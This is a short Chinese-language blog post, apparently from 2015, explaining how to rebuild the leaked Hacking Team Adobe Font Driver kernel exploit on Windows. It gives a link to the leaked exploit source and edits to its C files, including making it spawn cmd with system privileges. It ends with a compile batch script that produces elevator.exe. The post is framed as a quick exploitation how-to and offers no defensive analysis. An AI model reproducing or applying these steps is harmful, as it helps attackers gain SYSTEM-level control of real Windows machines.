Hacking Team Adobe Font Driver 提权 快速利用介绍

三好学生 | 2015-07-15 11:22

0x00 目标

利用Hacking Team 的Adobe Font Driver内核漏洞代码,重新编译,获得系统权限。

0x01 测试环境

Windows 7 (32-bit)

0x02 样本分析

已知成功环境:

WindowsXP~Windows 8.1,X86和X64

0x03 样本测试

0x04 简单修改

此处举例说明如何修改source_pie_7:

1、下载代码

http://ht.transparencytoolkit.org/gitlab/Windows-Multi-Browser/2_stage_shellcode_source/

2、搭建开发环境

安装lcc.exe

3、修改文件

进入source_pie_7文件夹

编辑elevator.c:

去掉#include "font.h"(减小文件体积)

编辑loader.c:

添加#include "font.h"(添加字体文件)

L104 calc改为cmd(执行calc改为cmd)

在void Loader()第三行插入memcpy(pVtable.lpLoaderConfig->foofont,foofont,755256);(赋值)

4、编译

compile.bat写入如下代码,运行后生成elevator.exe

c:\lcc\bin\lcc.exe -c elevator.c

c:\lcc\bin\lcc.exe -c loader.c

c:\lcc\bin\lcclnk.exe -subsystem console -o elevator.exe elevator.obj loader.obj wtsapi32.lib crypt32.lib wininet.lib

del elevator.obj elevator.exp elevator.lib

del loader.obj loader.exp loader.lib

5、测试

[原文地址]